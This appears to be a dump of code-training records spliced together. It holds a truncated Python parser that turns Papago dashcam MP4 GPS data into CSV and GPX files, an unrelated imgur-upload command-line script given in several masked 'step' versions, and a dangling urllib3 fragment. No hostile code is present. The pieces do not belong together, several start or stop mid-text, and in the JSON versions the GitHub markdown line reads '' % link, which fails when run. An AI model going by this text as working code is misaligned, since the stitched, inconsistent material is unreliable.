'#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the hour of time, but got an invalid value `{hour}'.\")\n\n minute = mp4_file.read(4)\n if len(minute) < 4:\n error_position = format(mp4_file.tell() - len(minute), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the minute of time, but got EOF.')\n minute = int.from_bytes(minute, 'little')\n if minute < 0 or 60 <= minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the minute of time, but got an invalid value `{minute}'.\")\n\n second = mp4_file.read(4)\n if len(second) < 4:\n error_position = format(mp4_file.tell() - len(second), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the second of time, but got EOF.')\n second = int.from_bytes(second, 'little')\n if second < 0 or 60 <= second:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the second of time, but got an invalid value `{second}'.\")\n\n year = mp4_file.read(4)\n if len(year) < 4:\n error_position = format(mp4_file.tell() - len(year), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the year of time, but got EOF.')\n year = int.from_bytes(year, 'little')\n if year == 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n if hour != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year == 0' but `hour != 0'.\")\n if minute != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year == 0' but `minute != 0'.\")\n if second != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year == 0' but `second != 0'.\")\n else:\n year += 2000\n\n month = mp4_file.read(4)\n if len(month) < 4:\n error_position = format(mp4_file.tell() - len(month), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the month of 
time, but got EOF.')\n month = int.from_bytes(month, 'little')\n if month == 0:\n if year != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year != 0' but `month == 0'.\")\n assert(hour == 0)\n assert(minute == 0)\n assert(second == 0)\n elif month < 1 or 12 < month:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the month of time, but got an invalid value `{month}'.\")\n\n day = mp4_file.read(4)\n if len(day) < 4:\n error_position = format(mp4_file.tell() - len(day), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the day of time, but got EOF.')\n day = int.from_bytes(day, 'little')\n if day == 0:\n if year != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year != 0' but `day == 0'.\")\n assert(month == 0)\n assert(hour == 0)\n assert(minute == 0)\n assert(second == 0)\n elif day < 1 or 31 < day:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the day of time, but got an invalid value `{day}'.\")\n\n if year == 0:\n assert(month == 0)\n assert(day == 0)\n assert(hour == 0)\n assert(minute == 0)\n assert(second == 0)\n time = None\n else:\n time = datetime.datetime.now(datetime.timezone.utc)\n time = time.astimezone()\n time = time.replace(\n year=year, month=month, day=day, hour=hour, minute=minute,\n second=second, microsecond=0)\n time = Time(time)\n\n if time is None:\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:'\n ' Expect zero-padding, but got EOF.')\n padding = int.from_bytes(padding, 'little')\n if padding != 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect\"\n f\" zero-padding, but got `{padding}'.\")\n status = None\n 
latitude_type = '0'\n longitude_type = '0'\n else:\n status = mp4_file.read(1)\n if len(status) < 1:\n error_position = format(mp4_file.tell() - len(status),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a status'\n ' character, but got EOF.')\n status = status.decode('UTF-8')\n if status not in ('A', 'V'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect `A' or `V' as a status character, but got an invalid character\\\n `{status}'.\")\n\n latitude_type = mp4_file.read(1)\n if len(latitude_type) < 1:\n error_position = format(\n mp4_file.tell() - len(latitude_type), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:\\\n Expect a latitude type, but got EOF.')\n latitude_type = latitude_type.decode('UTF-8')\n if status == 'A':\n if latitude_type not in ('N', 'S'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `N' or\\\n `S' as a latitude type, but got an invalid character `{latitude_type}'.\")\n else:\n assert(status == 'V')\n if latitude_type != '0':\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect `0' as a latitude type, but got an invalid character\\\n `{latitude_type}'.\")\n\n longitude_type = mp4_file.read(1)\n if len(longitude_type) < 1:\n error_position = format(\n mp4_file.tell() - len(longitude_type), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:\\\n Expect a longitude type, but got EOF.')\n longitude_type = longitude_type.decode('UTF-8')\n if status == 'A':\n if longitude_type not in ('E', 'W'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `E' or\\\n `W' as a longitude type, but got an invalid character `{longitude_type}'.\")\n else:\n assert(status == 'V')\n if longitude_type != '0':\n 
error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect `0' as a longitude type, but got an invalid character\\\n `{longitude_type}'.\")\n\n padding = mp4_file.read(1)\n if len(padding) < 1:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:'\n ' Expect zero padding, but got EOF.')\n if padding[0] != 0:\n error_position = format(mp4_file.tell() - 1, '#010x')\n byte = format(padding[0], '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n\n if status == 'A':\n latitude_dmm = read_little_endian_single(mp4_file)\n latitude_degree = math.floor(latitude_dmm / 100)\n if latitude_degree < 0 or 90 < latitude_degree:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.\")\n latitude_minute = latitude_dmm - latitude_degree * 100\n if latitude_minute < 0 or 60 <= latitude_minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.\")\n latitude_degree += latitude_minute / 60\n latitude = Latitude(latitude_degree)\n else:\n assert(status == 'V' or status is None)\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(\n mp4_file.tell() - len(padding), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:'\n ' Expect zero padding, but got EOF.')\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(\n mp4_file.tell() - 4 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n latitude = None\n\n if status == 'A':\n 
longitude_dmm = read_little_endian_single(mp4_file)\n longitude_degree = math.floor(longitude_dmm / 100)\n if longitude_degree < 0 or 180 < longitude_degree:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect a longitude in DMM format, but got an invalid value\\\n `{longitude_dmm}'.\")\n longitude_minute = longitude_dmm - longitude_degree * 100\n if longitude_minute < 0 or 60 <= longitude_minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect a longitude in DMM format, but got an invalid value\\\n `{longitude_dmm}'.\")\n longitude_degree += longitude_minute / 60\n longitude = Longitude(longitude_degree)\n else:\n assert(status == 'V' or status is None)\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(\n mp4_file.tell() - len(padding), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:'\n ' Expect zero padding, but got EOF.')\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(\n mp4_file.tell() - 4 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n longitude = None\n\n speed = read_little_endian_single(mp4_file)\n # Presume that speed is recorded in knots.\n speed *= (1852 / 3600)\n speed = Speed(speed)\n\n azimuth = read_little_endian_single(mp4_file)\n if azimuth < 0 or 360 <= azimuth:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n azimuth degree, but got an invalid value `{azimuth}'.\")\n azimuth = Azimuth(azimuth)\n\n x_acceleration = mp4_file.read(4)\n if len(x_acceleration) < 4:\n error_position = format(\n mp4_file.tell() - len(x_acceleration), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' X-axis acceleration, but got EOF.')\n 
x_acceleration = int.from_bytes(\n x_acceleration, 'little', signed=True)\n\n y_acceleration = mp4_file.read(4)\n if len(y_acceleration) < 4:\n error_position = format(\n mp4_file.tell() - len(y_acceleration), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' Y-axis acceleration, but got EOF.')\n y_acceleration = int.from_bytes(\n y_acceleration, 'little', signed=True)\n\n z_acceleration = mp4_file.read(4)\n if len(z_acceleration) < 4:\n error_position = format(\n mp4_file.tell() - len(z_acceleration), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' Z-axis acceleration, but got EOF.')\n z_acceleration = int.from_bytes(\n z_acceleration, 'little', signed=True)\n\n if mp4_file.tell() != small_block_end:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n the end of a GPS data block, but got additional data.')\n\n padding_size = large_block_end - small_block_end\n if padding_size < 532:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n more than or equal to 532-byte padding, but got only {padding_size}-byte\\\n padding.')\n padding = mp4_file.read(padding_size)\n if len(padding) < padding_size:\n error_position = format(\n mp4_file.tell() - len(padding), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n {padding_size}-byte padding, but got EOF.')\n for j, b in enumerate(padding[:420]):\n if b != 0:\n error_position = format(small_block_end + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n # `_UNKNOWN_BYTES` may appear in the zero padding. However,\n # what this means is unknown. 
Therefore, just skip it if it\n # appears.\n if padding[420:532] != _UNKNOWN_BYTES:\n for j, b in enumerate(padding[420:532]):\n if b != 0:\n error_position = format(small_block_end + 420 + j,\n '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n for j, b in enumerate(padding[532:]):\n if b != 0:\n error_position = format(small_block_end + 532 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n\n track_point = TrackPoint(\n time, status, latitude, longitude, speed, azimuth,\n x_acceleration, y_acceleration, z_acceleration)\n track_points.append(track_point)\n\n return track_points\n\n\ndef read_input_paths(input_paths: List[pathlib.Path]) -> List[TrackPoint]:\n track_points = []\n\n for input_path in input_paths:\n if input_path.is_dir():\n file_paths = []\n for dirpath, dirnames, filenames in os.walk(input_path):\n dirpath = pathlib.Path(dirpath)\n for filename in filenames:\n file_path = dirpath / filename\n if file_path.suffix not in ('.mp4', '.MP4'):\n continue\n file_paths.append(file_path)\n\n file_paths.sort()\n\n for file_path in file_paths:\n track_points.extend(parse_mp4_file(file_path))\n else:\n track_points.extend(parse_mp4_file(input_path))\n\n return track_points\n\n\ndef write_csv_file(args: Arguments,\n track_points: List[TrackPoint]) -> pathlib.Path:\n if args.name is None:\n print(\"`--name' is required to output a CSV file.\", file=sys.stderr)\n sys.exit(1)\n\n csv_file_path = pathlib.Path(f'{args.name}.csv')\n if csv_file_path.exists():\n if not args.overwrite:\n print(f\"{csv_file_path}: File already exists.\", file=sys.stderr)\n sys.exit(1)\n\n with open(csv_file_path, 'w') as csv_file:\n for track_point in track_points:\n print(track_point.format_as_csv(), file=csv_file)\n\n return csv_file_path\n\n\ndef create_track_segments(\n 
args: Arguments, track_points: List[TrackPoint]) -> List[TrackSegment]:\n new_track_points = []\n for track_point in track_points:\n if track_point.status != 'A':\n assert(track_point.latitude is None)\n assert(track_point.longitude is None)\n continue\n assert(track_point.latitude is not None)\n assert(track_point.longitude is not None)\n new_track_points.append(track_point)\n track_points = new_track_points\n\n track_points.sort()\n\n if len(track_points) == 0:\n return []\n\n unique_track_points = []\n it = iter(track_points)\n representative_track_point = next(it)\n while True:\n track_point = next(it, None)\n\n if track_point is None:\n unique_track_points.append(representative_track_point)\n break\n\n if track_point.time != representative_track_point.time:\n unique_track_points.append(representative_track_point)\n representative_track_point = track_point\n continue\n\n if track_point.latitude == representative_track_point.latitude\\\n and track_point.longitude == representative_track_point.longitude:\n continue\n\n if args.how_to_unique == 'first':\n continue\n elif args.how_to_unique == 'last':\n representative_track_point = track_point\n else:\n raise RuntimeError(\"There exist track points with the same\\\n timestamp but different coordinates. 
Use `--uniq' option.\")\n\n track_segments = []\n track_segments.append(TrackSegment())\n for track_point in unique_track_points:\n track_segments[0].append_track_point(track_point)\n\n return track_segments\n\n\ndef as_xml_attribute(data: str) -> str:\n return xml.sax.saxutils.quoteattr(data)\n\n\ndef as_xml_data(data: str) -> str:\n return xml.sax.saxutils.escape(data)\n\n\ndef get_local_time_in_iso8601() -> str:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n local_time_in_iso8601 = local_aware_now.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('([+-]\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', local_time_in_iso8601)\n\n\ndef write_gpx_file(args: Arguments,\n track_segments: List[TrackSegment]) -> pathlib.Path:\n all_track_points = []\n for track_segment in track_segments:\n for track_point in track_segment:\n all_track_points.append(track_point)\n\n name = args.name\n if name is None:\n if len(all_track_points) == 0:\n raise ValueError(\n \"`--name' is not specified, and there is no track point.\")\n all_track_points.sort()\n name = all_track_points[0].name\n\n gpx_file_path = pathlib.Path(f'{name}.gpx')\n\n bounds = None\n if len(all_track_points) > 0:\n latitudes = list(t.latitude for t in all_track_points)\n latitudes.sort()\n longitudes = list(t.longitude for t in all_track_points)\n longitudes.sort()\n bounds = (latitudes[0], longitudes[0], latitudes[-1], longitudes[-1])\n\n if gpx_file_path.exists():\n if not args.overwrite:\n print(f'{gpx_file_path}: Error: File already exists.',\n file=sys.stderr)\n sys.exit(1)\n\n with open(gpx_file_path, 'w') as gpx_file:\n print('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\" ?>',\n file=gpx_file)\n print('<gpx xmlns=\"http://www.topografix.com/GPX/1/1\" version=\"1.1\"'\n ' creator=\"papago2gpx\">', file=gpx_file)\n print(' <metadata>', file=gpx_file)\n print(f' <name>{as_xml_data(name)}</name>', file=gpx_file)\n if args.description is not None:\n description 
= as_xml_data(args.description)\n print(f' <desc>{description}</desc>', file=gpx_file)\n if args.author_name is not None or args.author_email is not None:\n print(' <author>', file=gpx_file)\n if args.author_name is not None:\n author_name = as_xml_data(args.author_name)\n print(f' <name>{author_name}</name>', file=gpx_file)\n if args.author_email is not None:\n author_email_parts = args.author_email.split('@', 1)\n if len(author_email_parts) != 2:\n raise RuntimeError(\n f'An invalid E-mail address: {args.author_email}')\n author_email_id = as_xml_attribute(author_email_parts[0])\n author_email_domain = as_xml_attribute(author_email_parts[1])\n print(f' <email id={author_email_id}\\\n domain={author_email_domain}/>', file=gpx_file)\n print(' </author>', file=gpx_file)\n if args.copyright is not None:\n copyright = as_xml_attribute(args.copyright)\n print(f' <copyright author={copyright}', end='', file=gpx_file)\n copyright_year = args.copyright_year\n copyright_license = args.copyright_license\n if copyright_year is not None or copyright_license is not None:\n print('>', file=gpx_file)\n if copyright_year is not None:\n copyright_year = as_xml_data(str(copyright_year))\n print(f' <year>{copyright_year}</year>',\n file=gpx_file)\n if copyright_license is not None:\n copyright_license = as_xml_data(copyright_license)\n print(f' <license>{copyright_license}</license>',\n file=gpx_file)\n print(' </copyright>', file=gpx_file)\n else:\n print('/>', file=gpx_file)\n print(f' <time>{get_local_time_in_iso8601()}</time>', file=gpx_file)\n if args.keywords is not None:\n keywords = as_xml_data(args.keywords)\n print(f' <keywords>{keywords}</keywords>', file=gpx_file)\n if bounds is not None:\n print(f' <bounds minlat=\"{bounds[0]}\" minlon=\"{bounds[1]}\"\\\n maxlat=\"{bounds[2]}\" maxlon=\"{bounds[3]}\"/>', file=gpx_file)\n print(' </metadata>', file=gpx_file)\n print(' <trk>', file=gpx_file)\n if args.track_name is not None:\n track_name = as_xml_data(args.track_name)\n 
print(f' <name>{track_name}</name>', file=gpx_file)\n if args.track_comment is not None:\n track_comment = as_xml_data(args.track_comment)\n print(f' <cmt>{track_comment}</cmt>', file=gpx_file)\n if args.track_description is not None:\n track_description = as_xml_data(args.track_description)\n print(f' <desc>{track_description}</desc>', file=gpx_file)\n if args.track_type is not None:\n track_type = as_xml_data(args.track_type)\n print(f' <type>{track_type}</type>', file=gpx_file)\n for track_segment in track_segments:\n print(' <trkseg>', file=gpx_file)\n for track_point in track_segment:\n print(f' <trkpt lat=\"{track_point.latitude}\"\\\n lon=\"{track_point.longitude}\">', file=gpx_file)\n print(f' <time>{track_point.time}</time>',\n file=gpx_file)\n print(' </trkpt>', file=gpx_file)\n print(' </trkseg>', file=gpx_file)\n print(' </trk>', file=gpx_file)\n print('</gpx>', file=gpx_file)\n\n proc = subprocess.run(\n ['xmllint', '--schema', 'gpx.xsd', str(gpx_file_path)],\n stdin=subprocess.DEVNULL, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, encoding='UTF-8')\n if proc.returncode != 0:\n print(f\"\"\"Failed to validate the GPX file `{gpx_file_path}'.\ncommand: {proc.args}\nstdout: {proc.stdout}\nstderr: {proc.stderr}\nreturncode: {proc.returncode}\"\"\", file=sys.stderr)\n\n return gpx_file_path\n\n\nif __name__ == '__main__':\n args = Arguments()\n\n track_points = read_input_paths(args.input_paths)\n\n csv_file_path = write_csv_file(args, track_points)\n print(f\"Succeeded! The result is output to `{csv_file_path}'.\")\n\n track_segments = create_track_segments(args, track_points)\n\n if args.name is None and len(track_segments) == 0:\n print(\"`--name' is not specified, and there is no track segment.\",\n file=sys.stderr)\n sys.exit(1)\n\n if len(track_segments) == 0:\n print('WARNING: There is no track segment.', file=sys.stderr)\n\n gpx_file_path = write_gpx_file(args, track_segments)\n\n print(f\"Succeeded! 
The result is output to `{gpx_file_path}'.\")\n sys.exit(0)\n",
"step-ids": [
47,
55,
64,
81,
82
]
}
|
[
47,
55,
64,
81,
82
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(args):
    """Upload the image at ``args.img_path`` to imgur via postimg, format the
    resulting link according to the CLI flags, copy it to the clipboard and
    print it.

    Returns None on upload failure (after printing diagnostics).
    """
    if not args.quiet:
        print('Uploading.....')
    resp = postimg.Imgur(args.img_path).upload()
    if not resp['success']:
        if not args.quiet:
            # Dump the full API response to help diagnose the failure.
            print(json.dumps(resp, sort_keys=True, indent=4,
                             separators=(',', ': ')))
        print('Unable to upload !!!')
        return None
    link = resp['data']['link']
    if args.github:
        # BUG FIX: was "'' % link", which discarded the link and copied an
        # empty string for --github. Emit GitHub markdown image syntax,
        # matching the "snap" alt text used by the --html branch.
        link = '![snap](%s)' % link
    elif args.reddit:
        link = '[Reddit](%s)' % link
    elif args.html:
        link = '<img src="%s" alt="snap">' % link
    pyperclip.copy(link)
    print(link)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(args):
    """Upload the image at ``args.img_path`` to imgur via postimg, format the
    resulting link according to the CLI flags, copy it to the clipboard and
    print it.

    Returns None on upload failure (after printing diagnostics).
    """
    if not args.quiet:
        print('Uploading.....')
    resp = postimg.Imgur(args.img_path).upload()
    if not resp['success']:
        if not args.quiet:
            # Dump the full API response to help diagnose the failure.
            print(json.dumps(resp, sort_keys=True, indent=4,
                             separators=(',', ': ')))
        print('Unable to upload !!!')
        return None
    link = resp['data']['link']
    if args.github:
        # BUG FIX: was "'' % link", which discarded the link and copied an
        # empty string for --github. Emit GitHub markdown image syntax,
        # matching the "snap" alt text used by the --html branch.
        link = '![snap](%s)' % link
    elif args.reddit:
        link = '[Reddit](%s)' % link
    elif args.html:
        link = '<img src="%s" alt="snap">' % link
    pyperclip.copy(link)
    print(link)
if __name__ == '__main__':
    # CLI entry point: one positional image path plus optional output-format
    # flags. The flags are not mutually exclusive; main() applies the first
    # match in the order github -> reddit -> html.
    parser = argparse.ArgumentParser(description=
        'Post/upload image on imgur.com', epilog=
        'link will automatically copied to clipboard')
    parser.add_argument('img_path', type=str, help=
        'image path of file')
    parser.add_argument('--github', action='store_true', help=
        'Github markdown code of imgur url')
    parser.add_argument('--html', action='store_true', help=
        'html <img> code of imgur url')
    parser.add_argument('--reddit', action='store_true', help=
        'reddit markdown code of imgur url')
    parser.add_argument('-q', '--quiet', action='store_true', help=
        'print only img url without verbose output')
    args = parser.parse_args()
    try:
        main(args)
    except KeyboardInterrupt:
        # Ctrl-C during upload: exit with a message instead of a traceback.
        print('Error: Interrupted by user!!')
<|reserved_special_token_1|>
from postimg import postimg
import argparse
import pyperclip
import json
def main(args):
    """Upload the image at ``args.img_path`` to imgur via postimg, format the
    resulting link according to the CLI flags, copy it to the clipboard and
    print it.

    Returns None on upload failure (after printing diagnostics).
    """
    if not args.quiet:
        print('Uploading.....')
    resp = postimg.Imgur(args.img_path).upload()
    if not resp['success']:
        if not args.quiet:
            # Dump the full API response to help diagnose the failure.
            print(json.dumps(resp, sort_keys=True, indent=4,
                             separators=(',', ': ')))
        print('Unable to upload !!!')
        return None
    link = resp['data']['link']
    if args.github:
        # BUG FIX: was "'' % link", which discarded the link and copied an
        # empty string for --github. Emit GitHub markdown image syntax,
        # matching the "snap" alt text used by the --html branch.
        link = '![snap](%s)' % link
    elif args.reddit:
        link = '[Reddit](%s)' % link
    elif args.html:
        link = '<img src="%s" alt="snap">' % link
    pyperclip.copy(link)
    print(link)
if __name__ == '__main__':
    # CLI entry point: one positional image path plus optional output-format
    # flags. The flags are not mutually exclusive; main() applies the first
    # match in the order github -> reddit -> html.
    parser = argparse.ArgumentParser(description=
        'Post/upload image on imgur.com', epilog=
        'link will automatically copied to clipboard')
    parser.add_argument('img_path', type=str, help='image path of file')
    parser.add_argument('--github', action='store_true', help=
        'Github markdown code of imgur url')
    parser.add_argument('--html', action='store_true', help=
        'html <img> code of imgur url')
    parser.add_argument('--reddit', action='store_true', help=
        'reddit markdown code of imgur url')
    parser.add_argument('-q', '--quiet', action='store_true', help=
        'print only img url without verbose output')
    args = parser.parse_args()
    try:
        main(args)
    except KeyboardInterrupt:
        # Ctrl-C during upload: exit with a message instead of a traceback.
        print('Error: Interrupted by user!!')
<|reserved_special_token_1|>
#!/usr/bin/env python
from postimg import postimg
import argparse
import pyperclip
import json
def main(args):
    """Upload the image at ``args.img_path`` to imgur via postimg, format the
    resulting link according to the CLI flags, copy it to the clipboard and
    print it.

    Returns None on upload failure (after printing diagnostics).
    """
    if not args.quiet:
        print("Uploading.....")
    resp = postimg.Imgur(args.img_path).upload()
    if not resp['success']:
        if not args.quiet:
            # Dump the full API response to help diagnose the failure.
            print(json.dumps(resp, sort_keys=True, indent=4,
                             separators=(',', ': ')))
        print("Unable to upload !!!")
        return None
    link = resp['data']['link']
    if args.github:
        # BUG FIX: was "'' % link", which discarded the link and copied an
        # empty string for --github. Emit GitHub markdown image syntax,
        # matching the "snap" alt text used by the --html branch.
        link = '![snap](%s)' % link
    elif args.reddit:
        link = '[Reddit](%s)' % link
    elif args.html:
        link = '<img src="%s" alt="snap">' % link
    pyperclip.copy(link)
    print(link)
if __name__ == '__main__':
    # CLI entry point: one positional image path plus optional output-format
    # flags. The flags are not mutually exclusive; main() applies the first
    # match in the order github -> reddit -> html.
    parser = argparse.ArgumentParser(description='Post/upload image on imgur.com', epilog='link will automatically copied to clipboard')
    parser.add_argument('img_path', type=str, help='image path of file')
    parser.add_argument('--github', action='store_true', help='Github markdown code of imgur url')
    parser.add_argument('--html', action='store_true', help='html <img> code of imgur url')
    parser.add_argument('--reddit', action='store_true', help='reddit markdown code of imgur url')
    parser.add_argument('-q','--quiet', action='store_true', help='print only img url without verbose output')
    args = parser.parse_args()
    try:
        main(args)
    except KeyboardInterrupt:
        # Ctrl-C during upload: exit with a message instead of a traceback.
        print("Error: Interrupted by user!!")
|
flexible
|
{
"blob_id": "705755340eef72470fc982ebd0004456469d23e4",
"index": 4859,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(args):\n if not args.quiet:\n print('Uploading.....')\n resp = postimg.Imgur(args.img_path).upload()\n if not resp['success']:\n if not args.quiet:\n print(json.dumps(resp, sort_keys=True, indent=4, separators=(\n ',', ': ')))\n print('Unable to upload !!!')\n return None\n link = resp['data']['link']\n if args.github:\n link = '' % link\n elif args.reddit:\n link = '[Reddit](%s)' % link\n elif args.html:\n link = '<img src=\"%s\" alt=\"snap\">' % link\n pyperclip.copy(link)\n print(link)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main(args):\n if not args.quiet:\n print('Uploading.....')\n resp = postimg.Imgur(args.img_path).upload()\n if not resp['success']:\n if not args.quiet:\n print(json.dumps(resp, sort_keys=True, indent=4, separators=(\n ',', ': ')))\n print('Unable to upload !!!')\n return None\n link = resp['data']['link']\n if args.github:\n link = '' % link\n elif args.reddit:\n link = '[Reddit](%s)' % link\n elif args.html:\n link = '<img src=\"%s\" alt=\"snap\">' % link\n pyperclip.copy(link)\n print(link)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Post/upload image on imgur.com', epilog=\n 'link will automatically copied to clipboard')\n parser.add_argument('img_path', type=str, help='image path of file')\n parser.add_argument('--github', action='store_true', help=\n 'Github markdown code of imgur url')\n parser.add_argument('--html', action='store_true', help=\n 'html <img> code of imgur url')\n parser.add_argument('--reddit', action='store_true', help=\n 'reddit markdown code of imgur url')\n parser.add_argument('-q', '--quiet', action='store_true', help=\n 'print only img url without verbose output')\n args = parser.parse_args()\n try:\n main(args)\n except KeyboardInterrupt:\n print('Error: Interrupted by user!!')\n",
"step-4": "from postimg import postimg\nimport argparse\nimport pyperclip\nimport json\n\n\ndef main(args):\n if not args.quiet:\n print('Uploading.....')\n resp = postimg.Imgur(args.img_path).upload()\n if not resp['success']:\n if not args.quiet:\n print(json.dumps(resp, sort_keys=True, indent=4, separators=(\n ',', ': ')))\n print('Unable to upload !!!')\n return None\n link = resp['data']['link']\n if args.github:\n link = '' % link\n elif args.reddit:\n link = '[Reddit](%s)' % link\n elif args.html:\n link = '<img src=\"%s\" alt=\"snap\">' % link\n pyperclip.copy(link)\n print(link)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Post/upload image on imgur.com', epilog=\n 'link will automatically copied to clipboard')\n parser.add_argument('img_path', type=str, help='image path of file')\n parser.add_argument('--github', action='store_true', help=\n 'Github markdown code of imgur url')\n parser.add_argument('--html', action='store_true', help=\n 'html <img> code of imgur url')\n parser.add_argument('--reddit', action='store_true', help=\n 'reddit markdown code of imgur url')\n parser.add_argument('-q', '--quiet', action='store_true', help=\n 'print only img url without verbose output')\n args = parser.parse_args()\n try:\n main(args)\n except KeyboardInterrupt:\n print('Error: Interrupted by user!!')\n",
"step-5": "#!/usr/bin/env python\nfrom postimg import postimg\nimport argparse\nimport pyperclip\nimport json\ndef main(args):\n if not args.quiet:\n print(\"Uploading.....\")\n resp = postimg.Imgur(args.img_path).upload()\n if not resp['success']:\n if not args.quiet:\n print(json.dumps(resp, sort_keys=True, indent=4, separators=(',', ': ')))\n print(\"Unable to upload !!!\")\n return None\n link = resp['data']['link']\n if args.github:\n link = ''%link\n elif args.reddit:\n link = '[Reddit](%s)'%link\n elif args.html:\n link = '<img src=\"%s\" alt=\"snap\">'%link\n pyperclip.copy(link)\n print(link)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Post/upload image on imgur.com', epilog='link will automatically copied to clipboard')\n parser.add_argument('img_path', type=str, help='image path of file')\n parser.add_argument('--github', action='store_true', help='Github markdown code of imgur url')\n parser.add_argument('--html', action='store_true', help='html <img> code of imgur url')\n parser.add_argument('--reddit', action='store_true', help='reddit markdown code of imgur url')\n parser.add_argument('-q','--quiet', action='store_true', help='print only img url without verbose output')\n args = parser.parse_args()\n try:\n main(args)\n except KeyboardInterrupt:\n print(\"Error: Interrupted by user!!\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import urllib3
import json
def download(url):
